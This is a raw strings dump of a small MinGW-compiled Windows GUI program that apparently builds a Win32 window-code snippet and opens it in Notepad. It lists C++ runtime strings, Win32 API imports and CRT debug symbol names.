IDI_WINLOGO
IDC_APPSTARTING
IDC_ARROW
IDC_CROSS
IDC_HAND
IDC_HELP
IDC_IBEAM
IDC_ICON
IDC_NO
IDC_SIZE
IDC_SIZEALL
IDC_SIZENESW
IDC_SIZENS
IDC_SIZENWSE
IDC_SIZEWE
IDC_UPARROW
IDC_WAIT
Snippet.txt
WindowClass
Window = CreateWindow( "WindowClass", "%s",
CW_USDEFAULT,
NULL, NULL, Instance, 0);
Notepad Snippet.txt
std::exception
std::bad_exception
eh_globals
__gnu_cxx::__concurrence_lock_error
__gnu_cxx::__concurrence_unlock_error
__terminate_handler_sh
__unexpected_handler_sh
terminate called after throwing an instance of '
what():
_GLOBAL_
(anonymous namespace)
string literal
[abi:
{default arg#
JArray
vtable for
VTT for
construction vtable for
typeinfo for
typeinfo name for
typeinfo fn for
non-virtual thunk to
virtual thunk to
covariant return thunk to
java Class for
guard variable for
TLS init function for
TLS wrapper function for
reference temporary #
for
hidden alias for
transaction clone for
non-transaction clone for
_Sat
_Accum
_Fract
operator
operator
false
java resource
decltype (
{parm#
global constructors keyed to
global destructors keyed to
{lambda(
{unnamed type#
[clone
restrict
volatile
const
complex
imaginary
__vector(
std::allocator
allocator
std::basic_string
basic_string
std::string
std::basic_string<char, std::char_traits<char>, std::allocator<char> >
std::istream
std::basic_istream<char, std::char_traits<char> >
basic_istream
std::ostream
std::basic_ostream<char, std::char_traits<char> >
basic_ostream
std::iostream
std::basic_iostream<char, std::char_traits<char> >
basic_iostream
alignof
const_cast
delete[]
dynamic_cast
delete
operator""
new[]
reinterpret_cast
static_cast
sizeof
throw
throw
signed char
boolean
double
long double
float
__float128
unsigned char
unsigned int
unsigned
unsigned long
__int128
unsigned __int128
short
unsigned short
wchar_t
long long
unsigned long long
decimal32
decimal64
decimal128
char16_t
char32_t
decltype(nullptr)
Unknown error
Argument domain error (DOMAIN)
Argument singularity (SIGN)
Overflow range error (OVERFLOW)
The result is too small to be represented (UNDERFLOW)
Total loss of significance (TLOSS)
Partial loss of significance (PLOSS)
Address %p has no image-section
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
use_fc_key
fc_key
sjlj_once
fc_static
idListCnt_shmem
idList_shmem
once_global_shmem
once_obj_shmem
idListMax_shmem
idListNextId_shmem
mtx_pthr_locked_shmem
pthr_root_shmem
pthr_last_shmem
_pthread_tls_shmem
_pthread_tls_once_shmem
_pthread_key_dest_shmem
_pthread_cancelling_shmem
_pthread_concur_shmem
_pthread_key_lock_shmem
_pthread_key_max_shmem
_pthread_key_sch_shmem
dummy_concurrency_level_shmem
mutex_global_shmem
c:/crossdev/src/winpthreads-svn6233/src/mutex.c
(m_->valid == LIFE_MUTEX) && (m_->busy > 0)
mutex_global_static_shmem
mxattr_recursive_shmem
mxattr_errorcheck_shmem
spin_locked_shmem
rwl_global_shmem
c:/crossdev/src/winpthreads-svn6233/src/rwlock.c
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)
cond_locked_shmem_rwlock
cond_locked_shmem_cond
N10__cxxabiv115__forced_unwindE
N10__cxxabiv117__class_type_infoE
N10__cxxabiv119__foreign_exceptionE
N10__cxxabiv120__si_class_type_infoE
N9__gnu_cxx24__concurrence_lock_errorE
N9__gnu_cxx26__concurrence_unlock_errorE
St13bad_exception
St9exception
St9type_info
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (tdm64-2) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
SetFileSecurityW
ChooseColorA
CreateSolidBrush
AddAtomA
CloseHandle
CreateEventA
CreateMutexA
CreateSemaphoreA
DeleteCriticalSection
DuplicateHandle
EnterCriticalSection
FindAtomA
GetAtomNameA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetHandleInformation
GetLastError
GetProcessAffinityMask
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadContext
GetThreadPriority
GetTickCount
InitializeCriticalSection
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedExchangeAdd
InterlockedIncrement
LeaveCriticalSection
QueryPerformanceCounter
ReleaseMutex
ReleaseSemaphore
ResetEvent
ResumeThread
SetEvent
SetLastError
SetProcessAffinityMask
SetThreadContext
SetThreadPriority
SetUnhandledExceptionFilter
Sleep
SuspendThread
TerminateProcess
TlsAlloc
TlsGetValue
TlsSetValue
TryEnterCriticalSection
UnhandledExceptionFilter
VirtualProtect
VirtualQuery
WaitForMultipleObjects
WaitForSingleObject
WinExec
__dllonexit
__getmainargs
__initenv
__lconv_init
__set_app_type
__setusermatherr
_acmdln
_amsg_exit
_beginthreadex
_cexit
_endthreadex
_fmode
_ftime
_initterm
_lock
_onexit
_setjmp3
_unlock
_write
abort
calloc
fclose
fopen
fprintf
fputc
fputs
fwrite
longjmp
malloc
memcmp
memcpy
memmove
memset
printf
realloc
signal
sprintf
strcmp
strlen
strncmp
vfprintf
CreateWindowExA
DefWindowProcA
DialogBoxParamA
DispatchMessageA
EnableWindow
EndDialog
GetDlgItem
GetDlgItemInt
GetDlgItemTextA
GetMessageA
IsDlgButtonChecked
LoadCursorA
LoadIconA
PostQuitMessage
RedrawWindow
RegisterClassA
SendDlgItemMessageA
SendMessageA
ShowWindow
TranslateMessage
ADVAPI32.dll
COMDLG32.DLL
GDI32.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/crtexe.c
size_t
unsigned int
uintptr_t
wchar_t
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
_EXCEPTION_RECORD
ExceptionCode
ExceptionFlags
ExceptionAddress
NumberParameters
ExceptionInformation
_CONTEXT
ContextFlags
FloatSave
SegGs
SegFs
SegEs
SegDs
SegCs
EFlags
SegSs
ExtendedRegisters
WINBOOL
DWORD
float
LPBYTE
signed char
short int
long long unsigned int
LONG_PTR
ULONG_PTR
PVOID
LPSTR
PLONG
HANDLE
ULONGLONG
EXCEPTION_ROUTINE
PEXCEPTION_ROUTINE
_FLOATING_SAVE_AREA
ControlWord
StatusWord
TagWord
ErrorOffset
ErrorSelector
DataOffset
DataSelector
RegisterArea
Cr0NpxState
FLOATING_SAVE_AREA
CONTEXT
PCONTEXT
EXCEPTION_RECORD
PEXCEPTION_RECORD
_EXCEPTION_POINTERS
ContextRecord
_EXCEPTION_REGISTRATION_RECORD
Handler
handler
FiberData
Version
_NT_TIB
ExceptionList
StackBase
StackLimit
SubSystemTib
ArbitraryUserPointer
NT_TIB
PNT_TIB
_IMAGE_DOS_HEADER
e_magic
e_cblp
e_crlc
e_cparhdr
e_minalloc
e_maxalloc
e_csum
e_lfarlc
e_ovno
e_res
e_oemid
e_oeminfo
e_res2
e_lfanew
IMAGE_DOS_HEADER
PIMAGE_DOS_HEADER
_IMAGE_FILE_HEADER
Machine
NumberOfSections
TimeDateStamp
PointerToSymbolTable
NumberOfSymbols
SizeOfOptionalHeader
Characteristics
IMAGE_FILE_HEADER
_IMAGE_DATA_DIRECTORY
VirtualAddress
IMAGE_DATA_DIRECTORY
_IMAGE_OPTIONAL_HEADER
Magic
BaseOfData
IMAGE_OPTIONAL_HEADER32
PIMAGE_OPTIONAL_HEADER32
_IMAGE_OPTIONAL_HEADER64
Magic
PIMAGE_OPTIONAL_HEADER64
_IMAGE_NT_HEADERS
Signature
FileHeader
OptionalHeader
PIMAGE_NT_HEADERS32
PIMAGE_NT_HEADERS
PIMAGE_TLS_CALLBACK
HINSTANCE__
unused
HINSTANCE
PTOP_LEVEL_EXCEPTION_FILTER
LPTOP_LEVEL_EXCEPTION_FILTER
_STARTUPINFOA
lpReserved
lpDesktop
lpTitle
dwXSize
dwYSize
dwXCountChars
dwYCountChars
dwFillAttribute
dwFlags
wShowWindow
cbReserved2
lpReserved2
hStdInput
hStdOutput
hStdError
STARTUPINFOA
STARTUPINFO
double
long double
_invalid_parameter_handler
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
_PVFV
_PIFV
newmode
_startupinfo
__uninitialized
__initializing
__initialized
_exception
retval
_TCHAR
__readfsdword
!Offset
#_TEB
$NtCurrentTeb
%duplicate_ppstrings
'__mingw_invalidParameterHandler
(expression
(function
(file
(line
(pReserved
)check_managed_app
"pDOSHeader
"pPEHeader
"pNTHeader32
"pNTHeader64
*pre_c_init
'pre_cpp_init
*__tmainCRTStartup
4lpszCommandLine
5StartupInfo
4inDoubleQuote
4lock_free
4fiberid
4nested
>WinMainCRTStartup
>mainCRTStartup
5argc
5argv
5envp
5argret
5mainret
5managedapp
5has_cctor
5startinfo
A__globallocalestatus
A_imp___fmode
A_dowildcard
A_newmode
A_imp____initenv
A_imp___acmdln
A__native_startup_state
A__native_startup_lock
CA_image_base__
A_imp___commode
A_fmode
A__xi_a
A__xi_z
A__xc_a
A__xc_z
A__dyn_tls_init_callback
A__onexitbegin
A__onexitend
Amingw_app_type
E__mingw_winmain_hInstance
E__mingw_winmain_lpCmdLine
E__mingw_winmain_nShowCmd
A__mingw_oldexcpt_handler
Emingw_pcinit
Emingw_pcppinit
A_MINGW_INSTALL_DEBUG_MATHERR
Fmingw_initltsdrot_force
Fmingw_initltsdyn_force
Fmingw_initltssuo_force
Fmingw_initcharmax
G__set_app_type
H_encode_pointer
I_setargv
G__mingw_setusermatherr
H__getmainargs
Hstrlen
Jmalloc
Kmemcpy
L_pei386_runtime_relocator
\H_set_invalid_parameter_handler
L_fpreset
)L__main
LHmain
L_cexit
7G_amsg_exit
G_initterm
Mexit
L__security_init_cookie
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/tlssup.c
unsigned int
uintptr_t
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
ULONG
WINBOOL
DWORD
float
LPVOID
signed char
short int
long long unsigned int
ULONG_PTR
PVOID
HANDLE
PIMAGE_TLS_CALLBACK
_IMAGE_TLS_DIRECTORY32
StartAddressOfRawData
EndAddressOfRawData
AddressOfIndex
AddressOfCallBacks
SizeOfZeroFill
Characteristics
IMAGE_TLS_DIRECTORY32
IMAGE_TLS_DIRECTORY
_PVFV
__dyn_tls_init
pfunc
__dyn_tls_dtor
__dyn_tls_init@12
__tlregdtor
__xd_a
__xd_z
_tls_index
_tls_start
_tls_end
__xl_a
__xl_z
_tls_used
_CRT_MT
__dyn_tls_init_callback
__xl_c
__xl_d
mingw_initltsdrot_force
mingw_initltsdyn_force
mingw_initltssuo_force
__mingw_TLScallback
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/charmax.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
_PIFV
my_lconv_init
mingw_initcharmax
_charmax
__mingw_pinit
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/mingw_helpers.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
_decode_pointer
codedptr
_encode_pointer
mingw_app_type
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/xtxtmode.c
_fmode
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/atonexit.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
_onexit_t
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
_PVFV
mingw_onexit
onexitbegin
onexitend
retval
atexit
__onexitbegin
__onexitend
_imp___onexit
_decode_pointer
_lock
__dllonexit
_encode_pointer
_unlock
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/_newmode.c
_newmode
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/wildcard.c
_dowildcard
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/natstart.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
__uninitialized
__initializing
__initialized
__native_startup_state
__native_startup_lock
__native_dllmain_reason
__native_vcclrit_reason
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/crt_handler.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
_EXCEPTION_RECORD
ExceptionCode
ExceptionFlags
ExceptionAddress
NumberParameters
ExceptionInformation
_CONTEXT
ContextFlags
FloatSave
SegGs
SegFs
SegEs
SegDs
SegCs
EFlags
SegSs
ExtendedRegisters
DWORD
float
signed char
short int
long long unsigned int
ULONG_PTR
PVOID
_FLOATING_SAVE_AREA
ControlWord
StatusWord
TagWord
ErrorOffset
ErrorSelector
DataOffset
DataSelector
RegisterArea
Cr0NpxState
FLOATING_SAVE_AREA
CONTEXT
PCONTEXT
EXCEPTION_RECORD
PEXCEPTION_RECORD
_EXCEPTION_POINTERS
ContextRecord
EXCEPTION_POINTERS
PTOP_LEVEL_EXCEPTION_FILTER
LPTOP_LEVEL_EXCEPTION_FILTER
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
__p_sig_fn_t
_gnu_exception_handler
_gnu_exception_handler@4
exception_data
old_handler
action
reset_fpu
__mingw_oldexcpt_handler
signal
_fpreset
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/cinitexe.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
_PVFV
__xi_a
__xi_z
__xc_a
__xc_z
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/dllargv.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
double
long double
_setargv
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/merr.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
_iobuf
_base
_flag
_file
_charbuf
_bufsiz
_tmpfname
_exception
retval
fUserMathErr
__mingw_raise_matherr
__mingw_setusermatherr
_matherr
pexcept
stUserMathErr
_imp___iob
__setusermatherr
fprintf
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/pseudo-reloc.c
__gnuc_va_list
__builtin_va_list
va_list
size_t
unsigned int
ptrdiff_t
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
DWORD
float
PBYTE
LPBYTE
LPVOID
signed char
short int
long long unsigned int
ULONG_PTR
SIZE_T
PVOID
_MEMORY_BASIC_INFORMATION
BaseAddress
AllocationBase
AllocationProtect
RegionSize
State
Protect
MEMORY_BASIC_INFORMATION
PhysicalAddress
VirtualSize
_IMAGE_SECTION_HEADER
VirtualAddress
SizeOfRawData
PointerToRawData
PointerToRelocations
PointerToLinenumbers
NumberOfRelocations
NumberOfLinenumbers
Characteristics
PIMAGE_SECTION_HEADER
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
_iobuf
_base
_flag
_file
_charbuf
_bufsiz
_tmpfname
addend
target
runtime_pseudo_reloc_item_v1
target
flags
runtime_pseudo_reloc_item_v2
magic1
magic2
version
runtime_pseudo_reloc_v2
old_protect
sec_start
__write_memory
oldprot
call_unprotect
do_pseudo_reloc
start
addr_imp
reldata
reloc_target
v2_hdr
newval
__report_error
#mark_section_writable
$addr
#restore_modified_sections
%oldprot
/_pei386_runtime_relocator
0was_init
1mSecs
the_secs
maxSections
8_imp___iob
8__RUNTIME_PSEUDO_RELOC_LIST__
8__RUNTIME_PSEUDO_RELOC_LIST_END__
8_image_base__
9__builtin_fwrite
fwrite
;vfprintf
<abort
=__mingw_GetSectionForAddress
>_GetPEImageBase
?memcpy
>__mingw_GetSectionCount
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/CRT_fp10.c
_fpreset
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/gccmain.c
unsigned int
ptrdiff_t
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
func_ptr
__do_global_dtors
__do_global_ctors
nptrs
__main
initialized
__CTOR_LIST__
__DTOR_LIST__
atexit
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/crt0_c.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
DWORD
float
signed char
short int
long long unsigned int
LPSTR
HINSTANCE__
unused
HINSTANCE
double
long double
flags
cmdline
__mingw_winmain_hInstance
__mingw_winmain_lpCmdLine
__mingw_winmain_nShowCmd
WinMain
WinMain@16
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/gs_support.c
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
double
float
long double
_EXCEPTION_RECORD
ExceptionCode
ExceptionFlags
ExceptionAddress
NumberParameters
ExceptionInformation
_CONTEXT
ContextFlags
FloatSave
SegGs
SegFs
SegEs
SegDs
SegCs
EFlags
SegSs
ExtendedRegisters
DWORD
signed char
short int
long long unsigned int
UINT_PTR
ULONG_PTR
PVOID
LONGLONG
LowPart
LowPart
_LARGE_INTEGER
QuadPart
LARGE_INTEGER
_FLOATING_SAVE_AREA
ControlWord
StatusWord
TagWord
ErrorOffset
ErrorSelector
DataOffset
DataSelector
RegisterArea
Cr0NpxState
FLOATING_SAVE_AREA
CONTEXT
PCONTEXT
EXCEPTION_RECORD
PEXCEPTION_RECORD
_EXCEPTION_POINTERS
ContextRecord
EXCEPTION_POINTERS
_FILETIME
dwLowDateTime
dwHighDateTime
FILETIME
NTSTATUS
ft_scalar
ft_struct
__security_init_cookie
cookie
systime
perfctr
__report_gsfailure
StackCookie
cookie
GS_ExceptionRecord
GS_ContextRecord
GS_ExceptionPointers
__security_cookie
__security_cookie_complement
!abort
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
